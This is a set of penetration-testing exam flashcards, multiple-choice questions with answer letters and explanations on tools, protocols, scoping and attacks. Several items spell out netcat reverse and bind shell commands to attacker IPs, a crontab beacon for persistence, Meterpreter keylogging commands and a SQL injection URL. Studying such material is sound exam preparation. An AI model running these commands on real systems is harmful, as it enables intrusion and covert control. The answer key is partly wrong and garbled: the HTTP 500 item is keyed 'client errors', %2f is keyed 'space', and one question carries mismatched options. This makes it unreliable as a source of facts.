Pentest
A. PowerShell uses keywords like Write-Host to output text to the display. Python uses keywords like print to output text to the display. Bash uses keywords like echo to output text to the display.
$my_var = 1 if ($my_var -eq 1) { Write-Host "Correct." } Else { Write-Host "Incorrect." } Which language is the code written in? A. PowerShell B. Python C. Bash D. Ruby
B. All that is needed is a browser that let's you inspect and edit cookies. All other potential answers deal with password and authentication cracking.
Changing the values stored in a cookie requires which of the following tools? A. John The Ripper B. A browser with developer tools enabled C. Hydra D. Hashcat
A. The 500 series response codes represent a variety of situations where there is a server-side fault. 200 series codes represent successful transactions and 400 series represent client issues.
HTTP status code messages in the 500 range represent: A. Client errors B. Server-side errors C. Successful transaction D. None of the above
B.
Jenkins is a popular tool for implementing: A. Code repositories B. CI / CD pipelines C. System patching D. Maintaining desired system state
C. Node Package Manager deals with maintaining Node libraries and source code packages. It is typically part of an automated build process.
NPM is short for: A. Node Performance Manager B. Node Protection Manager C. Node Package Manager D. Node Permission Manager
B.
Some tools that a pen tester could use might not be allowed in certain countries. It's important to understand geographic implications when planning your testing. What governs export control of technology and dual-use scenarios? A. The rules of engagement (RoE) B. The Wassenaar Arrangement C. SOX compliance D. All of the above
D. The -WindowStyle Hidden produces the hidden window.
Using PowerShell, what is the correct command to execute the script named myShell.ps1 in a hidden window? A. powershell.exe -Hidden .\myShell.ps1 B. powershell.exe .\myShell.ps1 -Hidden C. powershell.exe -HideWindow .\myShell.ps1 D. powershell.exe -WindowStyle Hidden .\myShell.ps1
B. Type 11 indicates that the TTL has reached 0 and expired.
What ICMP message type code would indicate that a packet could not arrive due to an expiring time to live? A. Type 0 B. Type 11 C. Type 8 D. Type 100
C.
What does %2f mean in a URL? A. A back slash B. A space C. A forward slash D. None of the above
B.
Which of the following protocols is the Representational State Transfer (REST) web application architecture based on? A. FTP B. HTTP C. SMB D. LDAP
B.
While inspecting a URL string, you see %20 several times. What does this represent? A. A back slash B. A space C. A forward slash D. Repeat % 20 times
D.
You are a penetration tester. You are looking at the type of penetration test that is not meant to identify as many vulnerabilities as possible but instead concentrates on the vulnerabilities that specifically align with the goals of gaining control of specific systems or data. What type of assessment are you looking at running? A. Goals-based B. Compliance-based C. Objectives-based D. Red team
B, E.
You are documenting the rules of engagement (ROE) for an upcoming penetration test. Which elements must be included? A. A list of IP addresses assigned to the systems you will use to conduct the test B. How you will communicate the results of the test with the target C. A list of penetration testing tools you will use during the test D. A list of references from past clients for whom you have conducted penetration tests E. A list of behaviors that are not allowed on the part of the target during the test
A, B.
You are documenting the rules of engagement (ROE) for an upcoming penetration test. Which elements must be included? (2) A. A timeline for the engagement B. A review of laws that specifically govern the target C. A list of similar organizations that you have assessed in the past D. A list of the target's competitors E. A detailed map of the target's network
B. A mandatory vacation policy requires that all users take time away from work to enjoy a break from their day to day routine of their jobs. But, there is a major side benefit to mandatory vacations regarding your company's security posture. It will require the company to have another employee fill in for the vacationing employee's normal roles and responsibilities by requiring mandatory vacations. The employee who is filling in might come across fraud, abuse, or theft that the vacationing employee is a part of.
You have been asked to write a new security policy to reduce the risk of employees working together to steal information from the Dion Training corporate network. Which of the following policies should you create to counter this threat? A. Least privilege policy B. Mandatory vacation policy C. Acceptable use policy D. Privacy policy
D. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors.
hich of the following tools is a post-exploitation framework that would allow a penetration tester to run PowerShell agents without requiring the use of powershell.exe? A. Responder B. Powersploit C. Searchsploit D. Empire
C. The start of authority (SOA) record stores important information about a domain or zone. Contents can include the email address of the administrator, when the domain was last updated, and how long the server should wait between refreshes.
A DNS record type of SOA represents: A. Stop of Authority B. Sequence of Authority C. Start of Authority D. Suspension of Authority
C.
A client has asked you to run a white-box penetration test. The goal is to assess the security of their web-based applications. These applications are based on Representational State Transfer (REST) architecture. During the scoping process, you determine that it would be helpful if you had access to the organization's internal documentation for these applications. Which of the following should you ask your client for? A. Web Services Description Language (WSDL) documentation B. Software Development Kit (SDK) documentation C. Web Application Description Language (WADL) documentation D. Application Programming Interface (API) documentation
A. To conduct a banner grab using telnet, you first must connect to the server using "telnet webserver 80". Once the connection establishes, you will receive a blank prompt, and you then issue the command "HEAD / HTTP/1.1". It requests the document header from the server and provides information such as the server software version and the server's operating system.
After issuing the command "telnet diontraining.com 80" and connecting to the server, what command conducts the banner grab? A. HEAD / HTTP/1.1 B. PUT / HTTP/2.0 C. HEAD / HTTP/2.0 D. PUT / HTTP/1.1
B. Using the -lp option sets up a listener on the machine using the port specified (52154 in this scenario). To start the connection to the listener, you would enter "nc <IPADDR> <PORT> -e <SHELL>", substituting the details for each parameter in each set of brackets.
Alex is conducting a penetration test of Dion Training's network. They just successfully exploited a host on the network. Which of the following command should Alex utilize to establish persistence on the machine by creating a bind shell using netcat? A. nc -p 52154 /bin/sh B. nc -lp 52154 -e /bin/sh C. nc -p 52154 -e /bin/sh D. nc -lvp 52154 /bin/sh
A. This command allows you to start monitoring the victim's clipboard for any content that might place there. The command clipboard_monitor_stop turns this off.
What does the following command do: clipboard_monitor_start A. Tells Meterpreter to start monitoring the victim's clipboard for content B. Tells Meterpreter to log your actions to the clipboard C. Instructs Meterpreter to start monitoring your local clipboard D. Sets the clipboard as the location Meterpreter should run scripts from
A, D.
Which of the following threat actors typically have the financial resources and technical expertise required to develop their own extensive exploits? (2) A. Organized crime B. Malicious insider C. Script kiddie D. Nation-state actor E. Hacktivist
D.
You have a Meterpreter session open with a victim system. Which of the following commands would allow you to dump the keystroke buffer from the target? A. keyscan_get B. keyscan_move C. keyscan_stop D. keyscan_dump
C. An on-path attack (previously known as a man-in-the-middle attack) is a general term when a perpetrator positions himself in a conversation between a user and an application, either to eavesdrop or impersonate one of the parties, making it appear as if a normal exchange of information is occurring. For example, if your user and server are both in the United States (English language), but the attacker is performing the on-path attack from Russia, then the server will utilize the Russian language in the certificate errors.
A user receives certificate errors in other languages within their web browser when accessing your company's website. Which of the following is the MOST likely cause of this issue? A. DoS B. Reflective DNS C. On-path attack D. ARP poisoning
A.
Using the CVSS system, what should you tell clients that the Base group score means? A. Represents vulnerability characteristics that do not change over time and do not depend on the environment B. Represents how a vulnerability changes over time C. Represents characteristics of a vulnerability within organizational context D. Represents the ease with which an attacker can exploit the vulnerability
D. Meterpreter is a shell and both Python and Netcat can be used to establish or script shells.
Which of the follow are shells or can be used to create shells? A. Netcat B. Meterpreter C. Python D. All of the above
D.
You work at a penetration testing consulting firm. An organization that you have not worked with previously calls and asks you to perform a black box assessment of its network. You agree on a price and scope over the phone. After quickly designing the test on paper, you begin execution later that afternoon. Was this test conducted properly? A. Yes, Proper penetration test planning and scoping procedures were followed B. No, new clients should be properly vetted before beginning an assignment C. No, a master service agreement (MSA) should be signed before testing begins D. No, the rules of engagement (ROE) for the test should be documented and signed by both parties
A, B.
Your penetration testing consulting firm has been negotiating a contract with the U.S. federal government to run penetration tests against some of its systems. Which agreements will you be asked to sign instead of a statement of work (SOW)? A. Statement of objective (SOO) B. Performance work statement (PWS) C. Noncompete agreement D. Purchase order (PO)
D.
A consultant has been hired to perform a penetration test for an organization. The target of the test is the organization's proprietary design documents. The aim is to circumvent security measures and gain unauthorized access to these documents. What type of assessment is being conducted in this scenario? A. Objective-based assessment B. Goal-based assessment C. Compliance-based assessment D. Red team assessment
A, E.
A consultant has been hired to perform a penetration test for an organization. The target of the test is the organization's proprietary design documents. The aim is to circumvent security measures and gain unauthorized access to these documents. What type of assessment is being conducted in this scenario? (2) A. Why is the test being performed? B. When was the last time a test was performed? C. What were the results of the last test performed? D. To whom should invoices be sent? E. Who is the target audience for the test?
C. A shell script is a file that contains a list of commands to be read and executed by the shell in Linux and macOS. A .sh file is used for a shell script and its first line always begins with #!/bin/bash that designates the interpreter. This line instructs the operating system to execute the script.
A coworker is creating a file containing a script. You look over their shoulder and see "#!/bin/bash" as the first line in the file. Based on this, what type of file extension should this script use? A. .py B. .vbs C. sh D. .bat
A, E. There are several methods for locating Domain Controllers, depending on what you know about the environment you are using. If you are using a Windows client, you can use the nslookup command. You need to specify which protocol you are searching for in the name. Since we are trying to identify domain controllers, we need to look for Kerberos and LDAP-based protocols on the intranet.diontraining.com domain.
A penetration tester is emulating an insider threat during an engagement. The penetration tester was given access to a regular user account and a basic Windows 10 client on the network. The penetration tester did not receive any network diagrams, maps, or target IP address. Their goal is to identify any possible Windows domain controllers on the intranet.diontaining.com domain. Which of the following commands should they use from the command prompt to achieve their goal? A. nslookup -type=any_kerberos._tcp.intranet.diontraining.com B. nslookup -type=any_smtp._tcp.intranet.diontraining.com C. nslookup -type=any_lanman._tcp.intranet.diontraining.com D. nslookup -type=any_ntlm._tcp.intranet.diontraining.com E. nslookup -type=any_ldap._tcp.intranet.diontraining.com
B.
A penetration tester uses a typical employee email account to send a phishing email to exploit to managers and executives within the target organization. The goal is to see how many actually fall for the exploit and click the link in the message. What kind of penetration test is being performed in this scenario? A. Black box B. Gray box C. White box D. Red box
E.
A team of testers is conducting an assessment for an organization. The team is not concerned with assessing a broad range of vulnerabilities. Instead, they are conducting a coordinated attack governed by very narrow objectives. The rules of engagement specify that they can use physical, electronic, and social exploits to achieve their objective. What kind of penetration test is happening in this scenario? A. Compliance-based B. White box C. Gray box D. Black box E. Red team
B. The nslookup command is used to query the Domain Name System to obtain the mapping between a domain name and an IP address or to view other DNS records. The "set type=ns" tells nslookup only reports information on name servers. If you used "set type=mx" instead, you would receive information only about mail exchange servers.
An attacker uses the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only the name servers? A. transfer type=ns B. set type=ns C. locate type=ns D. request type=ns
D. C and C++ contain built-in functions such as strcpy that do not provide a default mechanism for checking if data will overwrite the boundaries of a buffer. The developer must identify such insecure functions and ensure that every call made to them by the program is performed securely. Many development projects use higher-level languages, such as Java, Python, and PHP. These interpreted languages will halt execution if an overflow condition is detected. However, changing languages may be infeasible in an environment that relies heavily on legacy code. By ensuring that the operating system supports ASLR, you can make it impossible for a buffer overflow to work by randomizing where objects in memory are being loaded.
Dion Consulting Group has just won a contract to provide updates to an employee payroll system originally written years ago in C++. During your assessment of the source code, you notice the command "strcpy" is being used in the application. Which of the following provides is cause for concern, and what mitigation would you recommend to overcome it? A. strcpy could allow an integer overflow to occur; upgrade the OS to run ASLR to prevent a buffer overflow B. strcpy could allow a buffer overflow to occur; you should rewrite the entire system in Java C. strcpy could allow an integer overflow to occur; you should rewrite the entire system in Java D. strcpy could allow a buffer overflow to occur; upgrade the OS to run ASLR to prevent a buffer overflow
A. A swagger document is the REST API equivalent of a WSDL document that defines a SOAP-based web service. Since Dion Training's voucher fulfillment system uses a REST API, you should request a copy of the swagger document to conduct a more efficient assessment of their web application since this is a known-environment assessment. SDK documentation is used to document the software development kit and is not relevant to the REST API being tested. An XML Schema Definition (XSD) is a recommendation that enables developers to define the structure and data types for XML documents.
Dion Training has hired you to assess its voucher fulfillment REST API on its e-commerce website. Which of the following support resources would be MOST helpful when conducting a known-environment assessment of the API? A. Swagger document B. WSDL document C. XSD file D. SDK documentation
C. When targeting mobile devices, you must first determine if the company uses iPhones or Android-based devices. If they are using an iPhone, it becomes much more difficult to attack since iPhone users can only install trusted apps from the App Store. If the user has jailbroken their phone, they can sideload apps and other malware. After identifying a jailbroken device, you can use social engineering to trick the user into installing your malicious code and then take control of their device.
During the reconnaissance phase of a penetration test, you have determined that your client's employees all use iPhones that connect back to the corporate network over a secure VPN connection. Which of the following methods would MOST likely be the best method for exploiting these? A. Use web-based exploits against the devices web interfaces B. Use social engineering to trick a user into opening a malicious APK C. Identify a jailbroken device for easy exploitation D. Use a tool like ICSSPLOIT to target specific vulnerabilities
A. PhantomJS is a headless browser that is implement in JavaScript. Due to the headless nature of the tool, it is often used as part of a script for interacting with web applications.
PhantomJS is an example of what? A. Headless browser B. Headless database C. Headless web server D. Intrusion detection tool
C. A scheduled task or scheduled job is an instance of execution, like initiating a process or running a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Linux use the crontab command. The correct answer for this persistence is to enter the command "(crontab -l ; echo "*/20 * * * * /tmp/beacon.sh")| crontab -" that will run the script at "/tmp/beacon.sh every 20 minutes as the SYSTEM level user. The other variant of crontab is incorrect because it would run every 20 hours, not 20 minutes. The schtasks options are used in Windows, not in Linux.
Sarah is conducting a penetration test against Dion Training's Linux-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes? A. schtasks /create /tn beacon /tr C:\temp\beacon.bat \sc MONTHLY \mo 20 \ru SYSTEM B. (crontab -I ; echo "* */20 * * * /tmp/beacon.sh")|crontab - C. (crontab -I ; echo "*/20 * * * * /tmp/beacon.sh")|crontab - D. schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM
A, E. The BEST options are to configure the thermostat to use the WPA2 encryption standard (if supported) and place any Internet of Things (IoT) devices into a DMZ/screened subnet to segregate them from the production network. While enabling two-factor authentication on the device's website is a good practice, it will not increase the IoT device's security. While disabling the wireless connectivity to the thermostat will ensure it cannot be hacked, it also will make the device ineffective for the customer's normal operational needs. WEP is considered a weak encryption scheme, so you should use WPA2 over WEP whenever possible. Finally, upgrading the wireless access point's firmware is good for security, but it isn't specific to the IoT device's security. Therefore, it is not one of the two BEST options.
Tamera just purchased a Wi-Fi-enabled Nest Thermostat for her home. She has hired you to install it, but she is worried about a hacker breaking into the thermostat since it is an IoT device. Which of the following is the BEST thing to do to mitigate Tamera's security concerns? (Select TWO) A. Configure the thermostat to use a segregated part of the network by installing it into a screened subnet B. Enable two-factor authentication on the device's website C. Configure the thermostat to use the WEP encryption standard for additional confidentiality D. Disable wireless connectivity to the thermostat to ensure a hacker cannot access it E. Configure the thermostat to connect to the wireless network using WPA2 encryption and a long, strong password F. Upgrade the firmware of the wireless access point to the latest version to improve the security of the network
C. The HIPPA Security Rule outlines the requirements for data protection and acceptable methods
The HIPPA Security Rule defines what? A. The data to be protected B. The way in which enforcement, hearing, and penalties are applied C. Identifies requirements and methods for the protection of data D. Provides requirements for notifications when a breach has occurred
B.
The HTTPOnly attribute that can accompany a Set-Cookie response header is responsible for which of the following? A. Defining the domain where the cookie is valid B. Preventing the cookie from being accessed via JavaScript C. Defining the URL where the cookie is valid D. Setting the Secure flag to only allow for SSL connectors
C.
The Linux file system makes use of Read / Write / Execute permissions. What is the permission being applied to the Group in the following command: chmod 755 A. The Group can Read B. The Group can Write C. The Group can Read/Write D. The Group can Execute
B. Data exfiltration is not one of the phases. The 7 phases are: Pre-engagement activities; Intelligence gathering; Threat modeling; Vulnerability analysis; Exploitation; Post-exploitation; and Reporting.
The Penetration Testing Execution Standard (PTES) contains seven phases. Which one of the items below is not one of those phases? A. Pre-engagement B. Data exfiltration C. Threat modeling D. Exploitation
A. This command attempts to set up a null session to the IPC$ hidden share. Null sessions are not as common now as they once were, but sometimes an older Windows system that has been left without patches will still allow this type of connection.
The following command is an example of what: net use \\10.0.2.3\ipc$ "" /u:'' A. Sets up a null session B. Maps a drive C. Views the shares on the IPC system D. View the shares on the target IP address
D. Unquoted service paths are a direct result of the CreateProcess function in Windows operating systems, where the name of a directory or program in the search path is truncated when the function identifies a blank space in the path. Windows will attempt to load each truncated executable until it finds the correct one.
The unquoted service path vulnerability can be used to escalate privileges on a Windows target and exploits what function of the operating system? Weak access controls A. Weak access controls B. Windows registry C. Task Scheduler D. CreateProcess
B.
What does the Meterpreter command do: getuid A. Gets a unique ID B. Gets the current user's information C. Gets the ID of the application D. Gets the session ID
B.
What does the following command do: chmod u+x myScript.sh A. Updates the script file to be executable B. Gives the owner execute permissions on the file C. Gives users execute permissions on the file D. None of the above
D. By default, ping will send several ICMP echo requests. Using the -c parameter, you can control how many echo requests are sent. In this case, we're only sending a single request.
What does the following command do: ping -c 1 127.0.0.1 A. Consistently pings the target address at 1 second intervals B. Pings the target IP address a series of pings with a packet size of 1 C. Sends a ping using a C++ library D. Sends a single ping request to the target IP address
B. When using chmod to apply file permissions, the letter o represents all other users - those that are not the owner or associated with a group.
What does the letter o represent in the following command: chmod o+r myScript.sh A. The owner of the file B. All other users C. The group that access the file D. None of the above
C. This command can be run from the command line or as part of a script. It lists all of the active and listening UDP and TCP connections.
What is the result of issuing the following command: netstat -ano A. List TCP connections B. Lists UDP listeners C. Lists all active and listening UDP and TCP connections D. None of the above
D. The netcat (`nc`) utility can be used to forward data to remote hosts over the network. The command in this example is forwarding a command shell from the local Windows host to a remote host listening on port 4444/tcp.
What is this command doing? nc 192.168.1.50 4444 -e cmd.exe A.Forward a command shell from the remote host to the local Windows host over the network B. Forward a command shell from the remote host to the local Linux host over the network C. Forward a command shell from the local Linux host to a remote host over the network D. Forward a command shell from the local Windows host to a remote host over the network
A. The XMAS Tree Scan sends a packet with the FIN, URG, and PSH flags set and it is an extremely noisy scan to perform against a target. A TCP SYN scan is a stealth scan that sends a packet to the target with just the SYN flag set. This is what is displayed in this network traffic capture in Wireshark in this scenario. A FIN scan is used to send a packet to the target with only the FIN flag set. The NULL scan is a packet sent without any flags set.
What type of Nmap scan sends a packet with the FIN, URG, and PSH flags set? A. XMAS Tree scan B. NULL scan C. TCP SYN scan D. FIN scan
C. Static Application Security Testing (SAST) works by scanning code for security related defects. Most CI / CD pipelines will apply this type of scanning against code as it moves through.
What type of security testing is usually part of a CI / CD deployment pipeline and is put in place to scan code for security issues? A. DAST scanning B. Black-box scanning C. SAST scanning D. White-box scanning
A. Connection String Parameter Pollution (CSPP) exploits specifically the semicolon-delimited database connection strings that are constructed dynamically based on the user inputs from web applications. CSPP, if carried out successfully, can be used to steal user identities and hijack web credentials. CSPP is a high-risk attack because of the relative ease with which it can be carried out (low access complexity) and the potential results it can have (high impact). Exploit chaining involves multiple commands and exploits being conducted in a series to fully attack or exploit a given target.
What type of technique does exploit chaining often implement? A. Injecting parameters into a connection string using semicolons as a separator B. Adding multiple parameters with the same name in HTTP requests C. Setting a user's session identifier (SID) to an explicit known value D. Inserting malicious JavaScript code into input parameters
D. TCPdump (along with many other packet capture tools) implement Berkeley Packet Filtering (BPF). This allows for a common approach to specifying source, destination, protocol, port, and other packet attributes when filtering.
What types of filters can you apply to TCP dump in order analyze traffic? A. PCAP B. BPP C. BFF D. BPF
C. This setting will ensure that the cookie is only sent over a HTTP connection and will deny access to scripts attempting to read or obtain the cookie.
When a cookie has the HTTPOnly flag set, what does this mean? A. The cookie will be compatible with HTTP B. The cookie will be signed C. The cookie will not allow script access D. None of the above
B. This is an example of a reverse shell that will connect to 10.0.0.1:8888 and spawn a shell session.
When executed on a victim machine, what does the following command accomplish: nc 10.0.0.1 8888 -e /bin/sh A. Starts a bind shell with Netcat B. Starts a reverse shell with Netcat C. Starts a full shell with Netcat D. None of the above
D. John The Ripper requires the Linux passwd and shadow files. A crack file is created by combining these two files using the unshadow command.
When using John The Ripper, what three files are needed? A. Linux passwd file B. Linux shadow file C. Crack file produced by unshadow D. All of the above
D.
When using Meterpreter, what does the following command do: shell A. Creates a reverse shell B. Creates a bind shell C. Opens a shell with Netcat D. Opens a standard OS command shell
B. This is the syntax Scapy uses when writing packets out to a PCAP file. Scapy or other tools like TCPdump or Wireshark can then read and analyze the packets at a later time.
When using Scapy, what does the following do: wrpcap() A. Reads packets from a PCAP file B. Writes a list of packets to a PCAP file C. Sends the contents of the PCAP file over the wire D. Disables packet capture
C. Setting the RST flag means you want both sides of the communication channel terminated. This is a forced disconnect.
Which TCP flag forces the termination of communications between systems? A. FIN B. ACK C. RST D. PSH
C, D. 'strings' is correct because the `strings` command is a useful utility in Linux to print the strings of printable characters in files (that is, ASCII characters) that are at least four characters in length. 'binwalk' is correct because the `binwalk` command is a fast and easy-to-use tool for analyzing and reverse-engineering executables and firmware images, such as those loaded on embedded devices (Wi-Fi routers, IoT, and so on).
Which command can be used to help analyze the contents of a binary file? (Select two) A. `echo` B. `cat` C. `strings` D. `binwalk`
B. SYSVOL is a shared directory used to store logon scripts, Group Policy data, and other domain-wide data that is viewable by any user who is a member of the domain.
Which network share is available to any member of an organization's Windows Active Directory domain and holds Group Policy Preferences (GPP) to help automate tedious administrative tasks? A. ADMIN$ B. SYSVOL C. IPC$ D. C$
D. The IPC$ share, also known as the null session share, allows anonymous hosts on the network to perform certain activities such as enumerating domain accounts and network shares. ADMIN$ and C$ are incorrect because the ADMIN$ and C$ Windows shares are only accessible over the network by local or domain administrator accounts.
Which of the following Windows shares are readable on the local area network by default? A. All of the answer choices are correct B. C$ C. ADMIN$ D. IPC$
C. XSS, RFI, and LFI are all web application attacks that deal with either injection of script or file inclusion
Which of the following attacks are most often launched against web applications? A. Local File Inclusion (LFI) B. Remote File Inclusion (RFI) C. Cross-site Scripting (XSS) D. All of the above
A. A reverse shell is established when the target machine communicates with an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command "nc -lp 31337" on it. To connect to the attacking machine from the victim machine, you would enter the command "nc 192.168.1.53 31337 -e /bin/sh" on it.
Which of the following commands should be run on an attacker's system to configure it to accept a connection from a target configured to run a reverse shell? A. nc -lp 31337 B. nc 192.168.1.53 31337 C. nc 192.168.1.53 31337 -e /bin/sh D. nc -lp 31337 -e /bin/sh
A. A bind shell is established when a victim system "binds" its shell to a local network port. To achieve this using netcat, you should execute the command "nc -lp 31337 -e /bin/sh" on the victim machine. This sets up a listener on the machine on port 31337 and will execute the /bin/sh when another machine connects to its listener on port 31337. The attacker would enter the command "nc 192.168.1.53 31337" to connect to the victim's bind shell.
Which of the following commands should be run on an attacker's system to connect to a target with a bind shell running? A. nc 192.168.1.53 31337 B. nc 192.168.1.53 31337 -e /bin/sh C. nc -lp 31337 -e /bin/sh D. nc -lp 31337
B. Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.
Which of the following is a characteristic of a Blind SQL Injection vulnerability? A. The administrator of the affected application does not see an error message during a successful attack B. The attacker cannot see any of the display errors with information about the injection during a blind attack C. The administrator of the vulnerable application cannot see the request to the webserver D. The application properly filters the user input but it is still vulnerable to code injection in a blind attack
A.
Which of the following is a messaging protocol specification that defines how structured information can be exchanged between web applications and is created from WSDL files? A. SOAP B. XSD C. WADL D. Swagger
B. A real-time operating system (RTOS) is a special type of embedded OS. An RTOS is ideal for embedded systems because they tend to have strict requirements for when a task should be completed and do not have particularly taxing workloads. An RTOS uses a predictable and consistent scheduler, unlike a general-purpose OS like Windows or macOS.
Which of the following is a special type of embedded operating system that uses a predictable and consistent scheduler? A. Mobile B. RTOS C. IoT D. PoS
C.
Which of the following is an entity that processes nonstandard health information it receives from another entity into a standard format? A. HIPAA provider B. Healthcare covered entity C. Healthcare clearinghouse D. None of the above
D.
Which of the following is an open-source framework designed to help developers design, build, document, and test Representational State Transfer (REST) web services? A. SOAP B. XSD C. WSDL D. Swagger
A. ICMP ping request is Type 8. A Type 0 is the corresponding reply.
Which of the following is the correct type for a ping request? A. Type 8 B. Type 0 C. Type 11 D. None of the above
C. The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1, and 10 that stores users' passwords. It authenticates local and remote users. The SAM uses cryptographic measures to prevent unauthenticated users from accessing the system but could be cracked offline using a password cracker to determine the administrative user's passwords
Which of the following might be exploited on a Windows server to conduct a privilege escalation? A. SUID/SGID programs B. Ret2libc C. SAM database D. Sticky bits
D.
Which of the following operating systems support PowerShell? A. Windows B. Linux C. MacOS D. All of the above
A. The Open Source Security Testing Methodology Manual (OSSTMM) was developed by the Institute for Security and Open Methodologies (ISECOM) and it outlines every area of an organization that needs testing and how to conduct the relevant tests. The Penetration Testing Execution Standard (PTES) was developed by business professionals as a best practice guide for conducting penetration testing. The PTES contains seven main sections that are used to provide a comprehensive overview of the proper structure of a complete penetration test. The Open Web Application Security Project (OWASP) is an organization aimed at increasing awareness of web security and provides a framework for testing during each phase of the software development process. The OWASP Testing Guide (OTG) provides different steps for the testing process and outlines the importance of assessing the entire organization, including the people, processes, and technology, during a penetration test. The Information Systems Security Assessment Framework (ISSAF) is an open-source resource available to cybersecurity professionals. The ISSAF is comprised of documents that relate to penetration testing, such as guidelines on business continuity and disaster recovery along with legal and regulatory compliance.
Which of the following penetration testing methodologies or frameworks is an open-source collection of documents that outlines every area of an organization that needs to undergo testing, as well as provides details on how those tests should be conducted? A. Open Source Security Testing Methodology Manual (OSSTMM) B. Penetration TEsting Execution Standard (PTES) C. Information Systems Security Assessment Framework (ISSAF) D. OWASP Testing Guide (OTG)
C. Impacket is a collection of Python classes that provide low-level program access to packets, as well as to protocols and their implementation. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Searchsploit is a tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to recover sensitive information such as user names and passwords.
Which of the following tools provides a penetration tester with Python classes with low-level program access to packets, protocols, and their implementation? A. Searchsploit B. Empire C. Impacket D. Responder
A.
Which of the following tools should a penetration tester use as a .NET framework to conduct penetration testing and debugging? A. Covenant B. Pacu C. Wapiti D. CeWL
C. WPScan (WordPress Security Scanner) is a tool that automatically gathers data about a WordPress site and compares its findings of plugins against a database of known vulnerabilities. ScoutSuite is an open-source tool written in Python that can be used to audit instances and policies created on multi-cloud platforms, such as AWS, Microsoft Azure, and Google Cloud. OllyDbg is a debugger included with Kali Linux that analyzes binary code found in 32-bit Windows applications. The truffleHog tool is used to automatically crawl through a repository looking for accidental commits of secrets within GitHub.
Which of the following tools should a penetration tester use to automatically gather details about plugins used on a WordPress site and compare them against a database of known vulnerabilities? A. Scout Suite B. truffleHog C. WPScan D. Ollydbg
C. WinDbg is a free debugging tool created and distributed by Microsoft for Windows operating systems. Gobuster is a tool that can discover subdomains, directories, and files by brute-forcing from a list of common names. CrackMapExec is a post-exploitation tool to identify vulnerabilities in active directory environments. Patator is a multi-purpose brute-force tool that supports several different methods, including ftp, ssh, smb, vnc, and zip passwords.
Which of the following tools should a penetration tester use to brute-force authentication on ftp, ssh, smb, vnc, or zip archive passwords? A. Gobuster B. CrackMapExec C. Patator D. WinDbg
C. Hydra is a password cracking tool that supports parallel testing of several network authentication types simultaneously. Mimikatz is a tool that gathers credentials by extracting key elements from memory such as cleartext passwords, hashes, and PIN codes. Gobuster is a tool that can discover subdomains, directories, and files by brute-forcing from a list of common names. The Web Application Attack and Audit Framework (w3af) allows you to identify and exploit a large set of web-based vulnerabilities, such as SQL injection and cross-site scripting.
Which of the following tools should a penetration tester use to conduct password cracking of multiple network authentication types simultaneously? A. Mimikatz B. w3af C. Hydra D. Gobuster
C. OllyDbg is a debugger included with Kali Linux that analyzes binary code found in 32-bit Windows applications. The truffleHog tool is used to automatically crawl through a repository looking for accidental commits of secrets within GitHub. WPScan (WordPress Security Scanner) is a tool that automatically gathers data about a WordPress site and compares its findings of plugins against a database of known vulnerabilities. ScoutSuite is an open-source tool written in Python that can be used to audit instances and policies created on multi-cloud platforms, such as AWS, Microsoft Azure, and Google Cloud.
Which of the following tools should a penetration tester use to debug a Windows executable in Kali Linux? A. truffleHog B. Scout Suite C. Ollydbg D. WPScan
B, C. Showmount is correct because the `showmount` command can be used to enumerate NFS shares from a Unix or Linux NFS file server. Nfs-showmount.nse is correct because `nfs-showmount.nse` can be used with the Nmap Scripting Engine to enumerate share information from NFS servers over the network.
Which of the following utilities can be used to enumerate NFS share information from a file server over the network? (Choose two.) A. `rpcinfo` B. `showmount` C. `nfs-showmount.nse` D. All of the answer choices are correct
D. The most prominent attack against WPS0-enabled wireless networks involves brute-forcing the 8-digit PIN that client uses to enroll their devices without knowing the pre-shared key. WPS checks each half of the PIN individually, reducing the number of possible combinations from a maximum of 100,000,000 to only 11,000. This only takes a few minutes to crack on most modern computers, as long as the WAP doesn't have a lockout after a certain number of failures. The lockout mechanism may also be triggered based on the client's MAC, so you can often spoof MAC to bypass this defense.
Which of the following weaknesses exist in WPS-enabled wireless networks? A. Utilizes TKIP to secure the authentication handshake B. Utilizes a 24-bit initialization vector C. Utilizes a 40-bit encryption key D. Brute force occurs within 11,000 combinations
C. The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contract their trusted point of contact within the organization to get further guidance.
Which of the following would trigger the penetration test to stop and contact the system owners during an engagement? A. A production server is unresponsive to ping requests B. Discovery of encrypted PII being stored on the system C. A production server is unresponsive after attempting exploitation D. Discovery of two servers not documented in the architecture diagrams
D. This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique.
While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of exploit are you attempting? A. Buffer overflow B. XML injection C. Session hijacking D. SQL injection
C. When using the NTFS file system, file can be layered on top of each other. This layering is called alternate data streams. This capability of the file system can be manipulated to hide files since only the top layer is usually visible.
